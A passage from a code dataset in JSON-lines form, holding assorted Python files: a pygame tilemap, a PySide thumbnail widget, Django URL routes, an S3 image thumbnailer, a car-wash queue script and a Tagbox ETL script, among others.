%s\" % err)\n return\n\n par = DictReader(show_warnings=self.show_warnings)\n self.doc = par.to_odml(self.parsed_doc)\n # Provide original file name via the in memory document\n self.doc._origin_file_name = basename(file)\n return self.doc\n\n elif self.parser == 'RDF':\n if not doc_format:\n raise ValueError(\"Format of the rdf file was not specified\")\n\n self.doc = RDFReader().from_file(file, doc_format)\n return self.doc\n\n def from_string(self, string, doc_format=None):\n\n if self.parser == 'XML':\n self.doc = xmlparser.XMLReader().from_string(string)\n return self.doc\n\n elif self.parser == 'YAML':\n try:\n self.parsed_doc = yaml.safe_load(string)\n except yaml.parser.ParserError as err:\n print(err)\n return\n\n self.doc = DictReader().to_odml(self.parsed_doc)\n return self.doc\n\n elif self.parser == 'JSON':\n try:\n self.parsed_doc = json.loads(string)\n except ValueError as err: # Python 2 does not support JSONDecodeError\n print(\"JSON Decoder Error: %s\" % err)\n return\n\n self.doc = DictReader().to_odml(self.parsed_doc)\n return self.doc\n\n elif self.parser == 'RDF':\n if not doc_format:\n raise ValueError(\"Format of the rdf file was not specified\")\n\n self.doc = RDFReader().from_string(string, doc_format)\n return self.doc\n\n\n# Constructor for PyYAML to load unicode characters\n# Needed only for < Python 3\ndef UnicodeLoaderConstructor(loader, node):\n return node.value\n","sub_path":"odml/tools/odmlparser.py","file_name":"odmlparser.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"463215071","text":"# tilemap.py\n\nimport pygame as pg\nimport pytmx\nfrom settings import *\n\n#HUD functions\ndef draw_player_health(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 20\n fill = pct * BAR_LENGTH\n outline_rect = pg.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pg.Rect(x, y, fill, BAR_HEIGHT)\n if pct > 0.6:\n col = GREEN\n elif pct > 0.3:\n col = YELLOW\n else:\n col = RED\n pg.draw.rect(surf, col, fill_rect)\n pg.draw.rect(surf, WHITE, outline_rect, 2)\n\n# Collision\ndef collide_with_walls(sprite, group, dir):\n if dir == 'x':\n hits = pg.sprite.spritecollide(sprite, group, False, collide_hit_rect)\n if hits:\n if hits[0].rect.centerx > sprite.hit_rect.centerx:\n sprite.pos.x = hits[0].rect.left - sprite.hit_rect.width / 2\n if hits[0].rect.centerx < sprite.hit_rect.centerx:\n sprite.pos.x = hits[0].rect.right + sprite.hit_rect.width / 2\n sprite.vel.x = 0\n sprite.hit_rect.centerx = sprite.pos.x\n if dir == 'y':\n hits = 
pg.sprite.spritecollide(sprite, group, False, collide_hit_rect)\n if hits:\n if hits[0].rect.centery > sprite.hit_rect.centery:\n sprite.pos.y = hits[0].rect.top - sprite.hit_rect.height / 2\n if hits[0].rect.centery < sprite.hit_rect.centery:\n sprite.pos.y = hits[0].rect.bottom + sprite.hit_rect.height / 2\n sprite.vel.y = 0\n sprite.hit_rect.centery = sprite.pos.y\n\ndef collide_hit_rect(one, two):\n return one.hit_rect.colliderect(two.rect)\n\nclass Map:\n def __init__(self, filename):\n self.data = []\n with open(filename, 'rt') as f:\n for line in f:\n self.data.append(line.strip())\n\n self.tilewidth = len(self.data[0])\n self.tileheight = len(self.data)\n self.width = self.tilewidth * TILESIZE\n self.height = self.tileheight * TILESIZE\n\nclass TiledMap:\n def __init__(self, filename):\n tm = pytmx.load_pygame(filename, pixelalpha=True)\n self.width = tm.width * tm.tilewidth\n self.height = tm.height * tm.tileheight\n self.tmxdata = tm\n\n def render(self, surface):\n ti = self.tmxdata.get_tile_image_by_gid\n for layer in self.tmxdata.visible_layers:\n if isinstance(layer, pytmx.TiledTileLayer):\n for x, y, gid, in layer:\n tile = ti(gid)\n if tile:\n surface.blit(tile, (x * self.tmxdata.tilewidth,\n y * self.tmxdata.tileheight))\n def make_map(self):\n temp_surface= pg.Surface((self.width, self.height))\n self.render(temp_surface)\n return temp_surface\n\nclass Camera:\n def __init__(self, width, height):\n self.camera = pg.Rect(0, 0, width, height)\n self.width = width\n self.height = height\n\n def apply(self, entity):\n return entity.rect.move(self.camera.topleft)\n\n def apply_rect(self, rect):\n return rect.move(self.camera.topleft)\n\n def update(self, target):\n x = -target.rect.centerx + int(WIDTH / 2)\n y = -target.rect.centery + int(HEIGHT / 2)\n\n # limit scrolling to map size\n x = min(0, x) # left\n y = min(0, y) # top\n x = max(-(self.width - WIDTH), x) # right\n y = max(-(self.height - HEIGHT), y) # bottom\n self.camera = pg.Rect(x, y, self.width, self.height)\n","sub_path":"tilemap.py","file_name":"tilemap.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"628048031","text":"\"\"\"Thumbnail classes.\"\"\"\n\nfrom PySide import QtGui\nfrom PySide import QtCore\n\nfrom .helpers import getTextSize\nfrom .exceptions import ThumbnailInsertionError, UnknownFlowError\nfrom .edge import Edge\n\n\n# Currently only affects Thumbnail label placement.\nFLOW_LEFT_TO_RIGHT = \"flow_left_to_right\"\nFLOW_RIGHT_TO_LEFT = \"flow_right_to_left\"\n\nclass EditableLabel(QtGui.QGraphicsTextItem):\n def __init__(self, txt, parent=None):\n super(EditableLabel, self).__init__(txt, parent=parent)\n self.setAcceptHoverEvents(True)\n self.setTextInteractionFlags(True)\n\n def setText(self, txt):\n self.setHtml(txt)\n \n\n\n#class Thumbnail(QtGui.QGraphicsPixmapItem):\nclass Thumbnail(QtGui.QGraphicsItem):\n \"\"\"A Thumbnail is a socket of a Node and can be connected to other Thumbnails.\"\"\"\n\n def __init__(self, **kwargs):\n\n self.path = kwargs.get(\"path\")\n print(\"path............. 
\" + self.path)\n \n self.pixmap = QtGui.QPixmap(self.path)\n\n \n\n super(Thumbnail, self).__init__(**kwargs)\n \n #super(Thumbnail, self).__init__(self.pixmap)\n\n self.label = QtGui.QLabel()\n \n \n \n self.x = 0\n self.y = 0\n self.w = 10\n self.h = 10\n\n self.margin = 5\n\n\n self.name = \"value\"\n self.displayName = self.name\n self.originalDisplayName = self.name\n\n #self.labelColor = QtGui.QColor(10, 10, 10)\n\n #self.labelColor = QtGui.QColor(127,127,127)\n #self.fillColor = QtGui.QColor(130, 130, 130)\n #self.highlightColor = QtGui.QColor(255, 255, 0)\n\n # Temp store for Edge currently being created.\n #self.newEdge = None\n\n #self.edges = []\n\n #self.setAcceptHoverEvents(True)\n\n def node(self):\n \"\"\"The Node that this Thumbnail belongs to is its parent item.\"\"\"\n return self.parentItem()\n\n def setPos(self, x, y):\n node = self.node()\n scene = node.scene()\n print(\"Setting thumbnail position : \" + str(x) + \", \"+ str(y))\n \n\n def boundingRect(self):\n \"\"\"Return the bounding box of this Thumbnail.\"\"\"\n rect = QtCore.QRect(self.x,\n self.y,\n self.w,\n self.h)\n return rect\n\n def highlight(self, toggle):\n \"\"\"Toggle the highlight color on/off.\n \n Store the old color in a new attribute, so it can be restored.\n \"\"\"\n if toggle:\n self._oldFillColor = self.fillColor\n self.fillColor = self.highlightColor\n else:\n self.fillColor = self._oldFillColor\n\n def paint(self, painter, option, widget):\n \"\"\"Draw the Thumbnail's shape and label.\"\"\"\n bbox = self.boundingRect()\n\n print(\"BBOX -> \" + str(bbox))\n #self.label.setPixmap(self.pixmap)\n \n #self.label.setParentItem(self.node())\n self.node().scene().addPixmap(self.pixmap)\n # Draw a filled rectangle.\n #painter.setPen(QtGui.QPen(QtCore.Qt.NoPen))\n #painter.setBrush(QtGui.QBrush(self.fillColor))\n #painter.drawRect(bbox)\n\n # Draw a text label next to it. 
Position depends on the flow.\n #textSize = getTextSize(self.displayName, None)#painter=painter)\n #if self.flow == FLOW_LEFT_TO_RIGHT:\n # x = bbox.right() + self.margin\n #elif self.flow == FLOW_RIGHT_TO_LEFT:\n # x = bbox.left() - self.margin - textSize.width()\n #else:\n # raise UnknownFlowError(\n # \"Flow not recognized: {0}\".format(self.flow))\n #y = bbox.bottom()\n\n #lbl = EditableLabel(self.displayName, self.node())\n\n #painter.setPen(QtGui.QPen(self.labelColor))\n #painter.drawText(x, y, self.displayName)\n #painter.drawText(x, y, lbl)\n #print(\"X -> \" + str(x) + \" Y -> \" + str(y))\n \n\n def hoverEnterEvent(self, event):\n \"\"\"Change the Thumbnail's rectangle color.\"\"\"\n self.highlight(True)\n if(isinstance(self, InputThumbnail)):\n self.originalDisplayName = self.displayName\n self.displayName = self.displayName + \" (editing...)\"\n self.node().updateSizeForChildren()\n super(Thumbnail, self).hoverEnterEvent(event)\n\n def hoverLeaveEvent(self, event):\n \"\"\"Change the Thumbnail's rectangle color.\"\"\"\n self.highlight(False)\n if(isinstance(self, InputThumbnail)):\n self.displayName = self.originalDisplayName\n self.node().updateSizeForChildren()\n super(Thumbnail, self).hoverLeaveEvent(event)\n\n def mousePressEvent(self, event):\n \"\"\"Handle Edge creation.\"\"\"\n if event.button() == QtCore.Qt.MouseButton.LeftButton:\n print(\"create edge\")\n\n self.newEdge = Edge()\n self.newEdge.source = self\n self.newEdge.targetPos = event.scenePos()\n self.newEdge.updatePath()\n\n # Make sure this is removed if the user cancels.\n self.addEdge(self.newEdge)\n return\n\n def mouseMoveEvent(self, event):\n \"\"\"Update Edge position when currently creating one.\"\"\"\n if self.newEdge:\n print(\"update edge\")\n self.newEdge.targetPos = event.scenePos()\n self.newEdge.updatePath()\n\n def mouseReleaseEvent(self, event):\n \"\"\"Finish Edge creation (if validations are passed).\n \n TODO: This currently implements some constraints regarding the Thumbnail\n connection logic, for which we should probably have a more\n flexible approach.\n \"\"\"\n if event.button() == QtCore.Qt.MouseButton.LeftButton:\n\n node = self.parentItem()\n scene = node.scene()\n target = scene.itemAt(event.scenePos())\n\n try:\n if self.newEdge and target:\n\n if self.newEdge.source is target:\n raise ThumbnailConnectionError(\n \"Can't connect a Thumbnail to itself.\")\n\n if isinstance(target, Thumbnail):\n\n if type(self) == type(target):\n raise ThumbnailConnectionError(\n \"Can't connect Thumbnails of same type.\")\n\n newConn = set([self, target])\n for edge in self.edges:\n existingConn = set([edge.source, edge.target])\n diff = existingConn.difference(newConn)\n if not diff:\n raise ThumbnailConnectionError(\n \"Connection already exists.\")\n return\n\n self.checkMaxConnections(target)\n\n print(\"finish edge\")\n target.addEdge(self.newEdge)\n self.newEdge.target = target\n self.newEdge.updatePath()\n self.finalizeEdge(self.newEdge)\n self.newEdge = None\n return\n \n else:\n print(\"The other case you just made....\")\n p = event.scenePos()\n print(str(p))\n \n\n raise ThumbnailInsertionError(\n \"Thumbnail did not work.\")\n\n except ThumbnailInsertionError as err:\n print(err)\n # Abort Edge creation and do some cleanup.\n print(\"Showing popup menu...\")\n \n self.removeEdge(self.newEdge)\n self.newEdge = None\n\n \n def finalizeEdge(self, edge):\n \"\"\"This intentionally is a NoOp on the Thumbnail baseclass.\n\n It is meant for subclass Thumbnails to implement special behaviour\n 
that needs to be considered when connecting two Thumbnails.\n \"\"\"\n pass\n\n def destroy(self):\n \"\"\"Remove this Thumbnail, its Edges and associations.\"\"\"\n print(\"destroy thumbnail:\", self)\n edgesToDelete = self.edges[::] # Avoid shrinking during deletion.\n for edge in edgesToDelete:\n edge.destroy()\n node = self.parentItem()\n if node:\n node.removeThumbnail(self)\n\n self.scene().removeItem(self)\n del self\n","sub_path":"python/qtnodes/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129443581","text":"import logging\nimport os\n\nfrom gensim.models import word2vec\n\nfrom nlp.word2vector.data_utils import load_comment_data, load_couplet_data\n\nCOMMENT_W2V_MODEL_PATH = './nlp/models/word2vec_comment.models'\nCOUPLET_W2V_MODEL_PATH = './nlp/models/word2vec_couplet.models'\n\n\ndef load_word2vector_comment_model():\n if os.path.exists(COMMENT_W2V_MODEL_PATH):\n model = word2vec.Word2Vec.load(COMMENT_W2V_MODEL_PATH)\n else:\n words_list = load_comment_data()\n model = word2vec.Word2Vec(words_list, min_count=1, iter=20)\n model.save(COMMENT_W2V_MODEL_PATH)\n\n\ndef load_word2vector_couplet_model():\n if os.path.exists(COUPLET_W2V_MODEL_PATH):\n model = word2vec.Word2Vec.load(COUPLET_W2V_MODEL_PATH)\n else:\n words_list = load_couplet_data()\n model = word2vec.Word2Vec(words_list, min_count=1, iter=20)\n model.save(COUPLET_W2V_MODEL_PATH)\n return model\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n model = load_word2vector_couplet_model()\n\n print(model.wv.most_similar('夜'))\n","sub_path":"nlp/word2vector/word2vector.py","file_name":"word2vector.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"646567279","text":"# coding=UTF-8\r\nimport requests\r\nimport baidu\r\nimport spider\r\ndef forecast():\r\n a='广州'\r\n web = requests.get('http://wthrcdn.etouch.cn/weather_mini?city='+a)\r\n web=web.json()\r\n data=web['data']['forecast'][0]\r\n day=data['date']\r\n temp1=data['high']\r\n temp2=data['low']\r\n type=data['type']\r\n print(day[-3:])\r\n text=a +day +temp1 + temp2+ type+'今天要上的课是'+str(spider.CourseTable(day[-3:]))\r\n baidu.sound(text)\r\nif(__name__=='__main__'):\r\n forecast()","sub_path":"forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"509574344","text":"from django.conf.urls import url\nfrom app01.views import consultant, teachers\n\nurlpatterns = [\n url(r'^login/', consultant.Login.as_view(), name='login'),\n url(r'^logoff/', consultant.Logoff.as_view(), name='logoff'),\n url(r'^register/', consultant.Register.as_view(), name='register'),\n\n url(r'^customer/', consultant.Customer.as_view(), name='customer'),\n url(r'^customer_query/', consultant.Customer.as_view(), name='customer_query'),\n url(r'^my_customer/', consultant.Customer.as_view(), name='my_customer'),\n url(r'^customer_add/', consultant.CustomerRep.as_view(), name='customer_add'),\n url(r'^customer_rep/(\\d+)', consultant.CustomerRep.as_view(), name='customer_rep'),\n\n url(r'^user_list/', consultant.UserList.as_view(), name='user_list'),\n\n url(r'^consult_record/$', consultant.ConsultRecord.as_view(), name='consult_record'),\n 
url(r'^consult_record/(?P\\d+)', consultant.ConsultRecord.as_view(), name='consult_record_one'),\n url(r'^consult_record_add/', consultant.ConsultRecordRep.as_view(), name='consult_record_add'),\n url(r'^consult_record_rep/(\\d+)', consultant.ConsultRecordRep.as_view(), name='consult_record_rep'),\n\n url(r'^enrollment/$', consultant.Enrollment.as_view(), name='enrollment'),\n url(r'^enrollment/(?P\\d+)', consultant.Enrollment.as_view(), name='enrollment_one'),\n url(r'^enrollment_add/(?P\\d+)$', consultant.EnrollmentAdd.as_view(), name='enrollment_add'),\n url(r'^enrollment_rep/(\\d+)', consultant.EnrollmentAdd.as_view(), name='enrollment_rep'),\n\n url(r'^classes/$', teachers.Classes.as_view(), name='classes'),\n url(r'^classes_add/', teachers.ClassesAdd.as_view(), name='classes_add'),\n url(r'^classes_rep/(\\d+)', teachers.ClassesAdd.as_view(), name='classes_rep'),\n\n url(r'^course_record/(?P\\d+)$', teachers.CourseRecord.as_view(), name='course_record'),\n url(r'^course_record_add/(?P\\d+)$', teachers.CourseRecordAdd.as_view(), name='course_record_add'),\n url(r'^course_record_rep/(?P\\d+)$', teachers.CourseRecordAdd.as_view(), name='course_record_rep'),\n\n url(r'^study_record_list/(\\d+)$', teachers.StudyRecord.as_view(), name='study_record_list'),\n]\n","sub_path":"app01/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"120327229","text":"import replay\nimport sys\nimport argparse\nimport time\n\n#time speed calculation is based on this article in liquidpedia: https://liquipedia.net/starcraft2/Game_Speed\n#In a replay done on faster (i.e. gamespeed 4), 42.86 in game seconds = 1 real world minute. Speed Factor = 1.4\n#so there is a 0.714 real-world second delay between each in-game second because 1 real-world second / 1.4 = 0.714\n#another way to think about this is that time ticks 71.4% fast in SC2 than in real time.\nTIME_DELAY = 0.01\n\n\n\ndef is_event_with_player_produced_unit(event):\n return (event['_event'] == 'NNet.Replay.Tracker.SUnitBornEvent') and (event['_gameloop'] > 100)\n\nparser = argparse.ArgumentParser(description='Everytime a SC2 unit is produced, a beat is played. 
This script generates an mp3 file')\nparser.add_argument('replay', type=str, help='path to .SC2Replay')\n\nargs = parser.parse_args()\n\nmy_replay = replay.Replay(args.replay)\ntrackerevents = my_replay.tracker_events()\n\nprint('--> extracting relevant events')\n\nrelevant_events = []\nfor t_event in trackerevents:\n if is_event_with_player_produced_unit(t_event):\n relevant_events.append(t_event)\n\nprint('--> creating audio')\n\n#audio loop\nmax_time = relevant_events[-1]['_gameloop'] + 10\nevent_len = len(relevant_events)\ni = 0\n\nprint(relevant_events[-1]['_gameloop'], relevant_events[-1]['m_unitTypeName'])\n\nfor t in range(max_time):\n # guard against running past the last event once all of them have been printed\n if i < event_len and relevant_events[i]['_gameloop'] == t:\n print(relevant_events[i]['m_unitTypeName'])\n i = i + 1\n\n time.sleep(TIME_DELAY)\n \n","sub_path":"rep-to-song.py","file_name":"rep-to-song.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"258999858","text":"from os import environ\nfrom boto.s3.key import Key\nfrom boto.s3.connection import S3Connection\nimport mimetypes\nimport Image\nimport sys\nimport cStringIO\n\nACCESS_KEY = environ['ACCESS_KEY']\nPASS_KEY = environ['PASS_KEY']\nBUCKET = environ['BUCKET']\n\nTHUMBNAIL_SIZE = 128, 128\n\ndef store_in_s3(filename, image):\n conn = S3Connection(ACCESS_KEY, PASS_KEY)\n bucket = conn.create_bucket(BUCKET)\n mime = mimetypes.guess_type(filename)[0]\n k = Key(bucket)\n k.key = filename\n k.set_metadata(\"Content-Type\", mime)\n\n out_bytes = cStringIO.StringIO()\n image.save(out_bytes, mime.split(\"/\")[-1])\n k.set_contents_from_string(out_bytes.getvalue())\n k.set_acl(\"public-read\")\n\ndef read_file(filename):\n name, ext = filename.split('.')\n ext = mimetypes.guess_type(filename)[0].split(\"/\")[-1]\n im = Image.open(filename)\n\n # Store the fullsize image\n store_in_s3(\".\".join((name, ext)), im)\n\n # Store the thumbnail\n thumb = im.copy()\n short_side = min(thumb.size)\n width, height = thumb.size\n left = (width - short_side) / 2\n top = (height - short_side) / 2\n thumb = thumb.crop((left, top, left+short_side, top+short_side))\n thumb.thumbnail(THUMBNAIL_SIZE, Image.ANTIALIAS)\n store_in_s3(name + \"_sm.\" + ext, thumb)\n thumb.save(name + \"_thumb\", ext)\n\n # Process the image to web size\n mid = process_image(im.copy())\n store_in_s3(name + \"_mid.\" + ext, mid)\n mid.save(name + \"_mid\", ext)\n\ndef process_image(im):\n original_width, original_height = [float(x) for x in im.size]\n original_aspect_ratio = original_width / original_height\n target_width, target_height = 1024.0, 768.0\n target_aspect_ratio = target_width / target_height\n\n if original_aspect_ratio < 1:\n # Switch values for portrait images\n target_width, target_height = target_height, target_width\n target_aspect_ratio = target_width / target_height\n\n if original_aspect_ratio > target_aspect_ratio:\n # Process wider images\n cutoff_one_side = \\\n (original_width - (original_height * target_aspect_ratio)) / 2.0\n im = im.crop(( int(cutoff_one_side),\n 0,\n int(original_width - cutoff_one_side),\n int(original_height)))\n else:\n # Process taller images: target height at this width is width / aspect ratio\n cutoff_one_way = \\\n (original_height - (original_width / target_aspect_ratio)) / 2.0\n im = im.crop(( 0,\n int(cutoff_one_way),\n int(original_width),\n int(original_height - cutoff_one_way)))\n im.load()\n\n if (im.size[0] > target_width) or (im.size[1] > target_height):\n im = im.resize((int(target_width), int(target_height)), Image.ANTIALIAS)\n\n return 
im\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n read_file(filename)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"552621280","text":"import random\nimport json\n\n \nwith open(\"data.json\") as file:\n data = json.load(file)\n\n\nclass MyCode:\n def __init__(self, code=[]):\n self.code = code\n your_letters = 'abcdefghifvwqzxp1234567890'\n for i in range(1, 5):\n x = random.choice(your_letters)\n self.code.append(x)\n self.code = \"\".join(self.code)\n\n\nclass CarType:\n\n def choose_car(self):\n while True:\n res = data['car_type'][0] + \", \" + data['car_type'][1]\n self.JeepSedan = input('\\nWhich of the following types is your car:' + res + ' ')\n self.JeepSedan = self.JeepSedan.upper()\n if self.JeepSedan in data['car_type']:\n return self.JeepSedan\n else:\n print('\\nIncorrect input')\n\n\nclass District:\n \n\n def choose_district(self):\n res_data = data['district'][0] + \", \" + data['district'][1] + \", \" + data['district'][2] + \", \" + data['district'][3]\n\n while True:\n self.district_choice = input('\\nWe have four car-washing companies choose the best for you:' + res_data + ' ')\n self.district_choice = self.district_choice.upper()\n if self.district_choice in data['district']:\n return self.district_choice\n else:\n print('\\nIncorrect input')\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n\n def last(self, data):\n if self.head is None:\n new_node = Node(data)\n new_node.prev = None\n self.head = new_node\n else:\n new_node = Node(data)\n cur = self.head\n while cur.next:\n cur = cur.next\n cur.next = new_node\n new_node.prev = cur\n new_node.next = None\n\n def first(self, data):\n if self.head is None:\n new_node = Node(data)\n new_node.prev = None \n self.head = new_node\n else:\n new_node = Node(data)\n self.head.prev = new_node\n new_node.next = self.head\n self.head = new_node\n new_node.prev = None\n\n def remove_last(self): \n if self.head is not None:\n temp = self.head\n while(temp.next is not None):\n prev = temp\n temp = temp.next\n prev.next = None\n else:\n print('Nothing to remove')\n\n def print_list(self):\n cur = self.head\n while cur:\n print('\\n',cur.data)\n cur = cur.next\n\n\nclass Result:\n\n def check_choice(self):\n\n name = input('Please mention your name ')\n premium_user = input(\"If you want to be the first in the queue you can type (y) Premium Option,Otherwise input (n) \") == 'y'\n res = ''\n dllist = DoublyLinkedList()\n dllist.last('Ani')\n\n if premium_user:\n res = '|Premium Choice + 1000amd'\n dllist.first(name)\n name += ' -- Premium User'\n else: \n dllist.last(name)\n\n MC = MyCode()\n Dist = District.choose_district(self)\n Chose = CarType.choose_car(self)\n\n car_washer = input('Done washing the car ? 
') == 'y'\n if car_washer:\n dllist.remove_last()\n dllist.print_list()\n else: \n dllist.print_list()\n\n\n info = {\n 'District':Dist,\n 'Car_choice':Chose,\n 'Code': MC.code,\n 'name': name\n }\n\n file_name = 'information.json'\n with open(file_name,'a') as f:\n json.dump(info,f,indent=2)\n\n\n if Dist == 'ZEYTUN':\n zey_data1 = data['choice_zeytun'][0] \n print(\"\\n\",zey_data1)\n\n if Chose == 'JEEP':\n zey_data2 = data['choice_zeytun'][1]\n print(\"\\n\",zey_data2,MC.code,res)\n\n\n elif Chose == 'SEDAN':\n zey_data3 = data['choice_zeytun'][2]\n print(\"\\n\",zey_data3,MC.code,res)\n\n elif Dist == 'KOMITAS':\n kom_data1 = data['choice_komtas'][0]\n print(\"\\n\",kom_data1)\n\n if Chose == 'JEEP':\n kom_data2 = data['choice_komtas'][1]\n print(\"\\n\",kom_data2,MC.code,res)\n\n elif Chose == 'SEDAN':\n kom_data3 = data['choice_komtas'][2]\n print(\"\\n\",kom_data3,MC.code,res)\n\n\n elif Dist == 'NOR-NORK':\n nor_data1 = data['choice_nornork'][0]\n print(\"\\n\",nor_data1)\n\n if Chose == 'JEEP':\n nor_data2 = data['choice_nornork'][1]\n print(\"\\n\",nor_data2,MC.code,res)\n\n elif Chose == 'SEDAN':\n nor_data3 = data['choice_nornork'][2]\n print(\"\\n\",nor_data3,MC.code,res)\n\n elif Dist == 'EREBUNI':\n erbuni_data1 = data['choice_erebuni'][0]\n print(\"\\n\",erbuni_data1)\n\n if Chose == 'JEEP':\n erbuni_data2 = data['choice_erebuni'][1]\n print(\"\\n\",erbuni_data2,MC.code,res)\n elif Chose == 'SEDAN':\n erbuni_data3 = data['choice_erebuni'][2]\n print(\"\\n\",erbuni_data3,MC.code,res)\n\n\ndef main():\n\n print('\\n Welcome \\n')\n while True:\n # keep the raw string so both the 'y' and 'no' branches are reachable\n people_choice = input('if you want to wash your car input yes(y) if no input no ')\n if people_choice == 'y':\n a = Result()\n a.check_choice()\n break\n elif people_choice == 'no':\n print('\\nAlways ready to help you when you need it \\n')\n break\n else:\n print('\\nIncorrect input')\n\n\nmain()\n\n\n\n\n","sub_path":"Final Project/DllMyCar.py","file_name":"DllMyCar.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"307309727","text":"import cv2\n\nclassificador = cv2.CascadeClassifier(\"cascades\\\\relogios.xml\")\n\nimagem = cv2.imread(\"outros\\\\relogio1.jpg\")\nimagemCinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY)\n\ndetectado = classificador.detectMultiScale(imagemCinza, scaleFactor=1.101, minNeighbors=2, minSize=(30,30))\n\nfor(x, y, l, a) in detectado:\n imagem = cv2.rectangle(imagem, (x,y),(x + l,y + a),(0,0,255),2)\n\ncv2.imshow(\"Encontrado\",imagem)\ncv2.waitKey()\n","sub_path":"ExemploRelogio.py","file_name":"ExemploRelogio.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"51939310","text":"from pathlib import Path\n\nimport yaml\n\nfrom json_to_models.dynamic_typing.string_serializable import StringSerializable, registry\nfrom json_to_models.generator import MetadataGenerator\nfrom json_to_models.models.attr import AttrsModelCodeGenerator\nfrom json_to_models.models.base import generate_code\nfrom json_to_models.models.structure import compose_models_flat\nfrom json_to_models.registry import ModelFieldsNumberMatch, ModelFieldsPercentMatch, ModelRegistry\n\n\n@registry.add()\nclass SwaggerRef(StringSerializable, str):\n @classmethod\n def to_internal_value(cls, value: str) -> 'SwaggerRef':\n if not value.startswith(\"#/\"):\n raise ValueError(f\"invalid literal for SwaggerRef: '{value}'\")\n return cls(value)\n\n def 
to_representation(self) -> str:\n return str(self)\n\n\ndef load_data() -> dict:\n with (Path(__file__) / \"..\" / \"..\" / \"spotify-swagger.yaml\").resolve().open() as f:\n data = yaml.load(f, Loader=yaml.SafeLoader)\n return data\n\n\ndef main():\n data = load_data()\n del data[\"paths\"]\n\n gen = MetadataGenerator(\n dict_keys_regex=[],\n dict_keys_fields=[\"securityDefinitions\", \"paths\", \"responses\", \"definitions\", \"properties\", \"scopes\"]\n )\n reg = ModelRegistry(ModelFieldsPercentMatch(.5), ModelFieldsNumberMatch(10))\n fields = gen.generate(data)\n reg.process_meta_data(fields, model_name=\"Swagger\")\n reg.merge_models(generator=gen)\n reg.generate_names()\n\n structure = compose_models_flat(reg.models_map)\n code = generate_code(structure, AttrsModelCodeGenerator)\n print(code)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"testing_tools/real_apis/spotify-swagger.py","file_name":"spotify-swagger.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"108840359","text":"from config import tagbox\nfrom logs.logger import log\n\nimport requests\nimport json\nimport jwt\n\n\nverbose = True\ntest = True\nlog('etl start')\n\n\n\n# Extract data from Tagbox\n\ntagbox_doc_endpoint = tagbox.document_endpoint\ntagbox_tag_endpoint = tagbox.geotag_endpoint\n#tagbox_params = {'doc_id': tagbox.test_doc_id}\n#tagbox_params = tagbox.test_docs\ntagbox_params = {}\ntagbox_secret = tagbox.secret\njwt_algorithm = 'HS256'\njwt_headers = {'kid': tagbox.key}\n\ntagbox_token = jwt.encode(\n tagbox_params,\n tagbox_secret,\n jwt_algorithm,\n jwt_headers\n).decode()\n\ntagbox_headers = {\n 'Authorization': 'Bearer {}'.format(tagbox_token)\n}\n\nif verbose:\n print('Tagbox request:\\n{}\\n'.format('\\n'.join([\n tagbox_tag_endpoint, \n str(tagbox_params),\n str(jwt_headers),\n str(tagbox_headers)]))\n )\n\ntagbox_tag_request = requests.get(\n tagbox_tag_endpoint,\n params=tagbox_params,\n headers=tagbox_headers\n)\ntagbox_tag_results = tagbox_tag_request.text\ntagbox_tags = json.loads(tagbox_tag_results)\n\nlog('{} tagbox tag results'.format(len(tagbox_tags)))\nif verbose:\n print('Tagbox tags:\\t{}'.format(len(tagbox_tags)))\n #print('Tags: {}'.format(tagbox_tags))\n\nunique_tagbox_docs = {}\nfor tag in tagbox_tags:\n if tag['created_at'] > '2019-01-22 19':\n unique_tagbox_docs[tag['postId']] = {} \n\nfor document_id in unique_tagbox_docs.keys():\n doc_params = {'document_id': document_id}\n doc_request_token = jwt.encode(\n doc_params,\n tagbox_secret,\n jwt_algorithm,\n jwt_headers\n ).decode()\n doc_headers = {\n 'Authorization': 'Bearer {}'.format(doc_request_token)\n }\n tagbox_doc_request = requests.get(\n tagbox_doc_endpoint, \n params=doc_params, \n headers=doc_headers\n )\n doc_result = tagbox_doc_request.text\n #print(doc_result)\n doc = json.loads(doc_result)\n print('document request results {}'.format(len(doc)))\n unique_tagbox_docs[document_id] = doc[0]\n\nlog('{} tagbox doc results'.format(len(unique_tagbox_docs)))\n#if verbose:\n# print('Tagbox docs: {}'.format(len(unique_tagbox_docs)))\n# for doc_id, doc in 